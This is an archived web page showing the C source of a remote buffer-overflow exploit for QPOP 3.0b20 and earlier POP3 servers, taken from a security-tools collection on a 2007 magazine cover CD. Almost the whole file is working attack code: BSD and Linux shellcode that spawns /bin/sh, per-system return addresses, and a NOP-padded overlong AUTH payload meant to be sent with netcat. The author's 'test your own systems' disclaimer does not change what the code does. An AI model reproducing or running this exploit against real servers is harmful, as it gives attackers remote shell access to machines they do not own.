Chip 2007 January, February, March & April

home *** CD-ROM | disk | FTP | other *** search

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / mail / pop3 / q3combo-private.c < prev next >

Wrap

C/C++ Source or Header | 2005-02-12 | 3KB | 124 lines

/* QPOP version 3.0b20 and lower beta versions REMOTE EXPLOIT * combination *BSD and Linux * * sk8@lucid-solutions.com * http://www.lucid-solutions.com * * I have written this to test and demonstrate vulnerabilities on clients' * systems only. * * !!!!!!!!!!DO NOT distribute!!!!!!!!!! * (at least not until Qualcomm issues a patch) * * You may only use this to test your own system(s). * I am not responsible for any unauthorized use of this program. * * tested on BSDI 3.0/4.0.1, FreeBSD 2.2.8/3.3, Linux * * Since popper is usually compiled by the admin, return addresses will vary, * but I have included common values. You may have to provide an offset * to get it to work on your system. * * I wrote the exploit near the beginning of November 1999, and unlike some * other exploits I've seen since, this one works even on Linux boxes on which * inetd was not started from a shell prompt. * * Usage: If you can't figure out how to use this, you shouldn't * be in the security business. (try netcat) */ #include <stdio.h> #include <stdlib.h> #include <sys/time.h> #include <sys/types.h> #include <unistd.h> #include <sys/socket.h> #include <netinet/in.h> #include <netdb.h> unsigned int NOP=0x90; unsigned long offset=0; /* default offset */ char bsdsc[]= "\xeb\x32\x5e\x31\xdb\x89\x5e\x07\x89\x5e\x12\x89\x5e\x17" "\x88\x5e\x1c\x8d\x1e\x89\x5e\x0e\x31\xc0\xb0\x3b\x8d\x7e" "\x0e\x89\xfa\x89\xf9\xbf\x10\x10\x10\x10\x29\x7e\xf5\x89" "\xcf\xeb\x01\xff\x62\x61\x63\x60\xeb\x1b\xe8\xc9\xff\xff" "\xff/bin/sh\xaa\xaa\xaa\xaa\xff\xff\xff\xbb\xbb\xbb\xbb" "\xcc\xcc\xcc\xcc\x9a\xaa\xaa\xaa\xaa\x07\xaa"; char linuxsc[]= "\xeb\x22\x5e\x89\xf3\x89\xf7\x83\xc7\x07\x31\xc0\xaa" "\x89\xf9\x89\xf0\xab\x89\xfa\x31\xc0\xab\xb0\x08\x04" "\x03\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xd9\xff" "\xff\xff/bin/sh"; struct version { int num; char* systype; int buffer_length; long address; }; struct version verlist[] = { { 0, "BSDI 2.x/3.x, FreeBSD 2.x", 1001, 0xefbfd56c }, {1, "BSDI 4.x", 1001, 0x8047564}, {2, "FreeBSD 3.x", 1001, 0xbfbfd3dc}, {3, "Linux", 990, 0xbfffd304}, {0, 0, 0, 0} }; int main(int argc, char** argv) { char* buffer, *shellcode; int buflen, i=0, ver, retaddr, align=0; struct sockaddr_in sockaddr; struct hostent* host; if (argc < 2) { printf("Usage: %s version [offset]\n", argv[0]); i=-1; printf("\nAvailable versions:\n"); while (verlist[++i].systype) { printf(" %d: %s\n", verlist[i].num, verlist[i].systype); } printf("\n"); exit(-1); } ver=atoi(argv[1]); if (argc > 2) { offset=atoi(argv[2]); } if (strstr(verlist[ver].systype, "Linux")) { shellcode=linuxsc; align=2; } else shellcode=bsdsc; buflen=verlist[ver].buffer_length; retaddr=verlist[ver].address; buffer=(char*)malloc(buflen); memset(buffer, NOP, buflen); memcpy(buffer, "AUTH ", 5); memcpy(buffer+800, shellcode, strlen(shellcode)); for (i=800+strlen(shellcode)+align; i< buflen-4; i+=4) { *((unsigned long int *)&buffer[i])=retaddr+offset; } buffer[buflen-2]='\n'; buffer[buflen-1]='\n'; printf("%s\n", buffer); } /* www.hack.co.za [2000]*/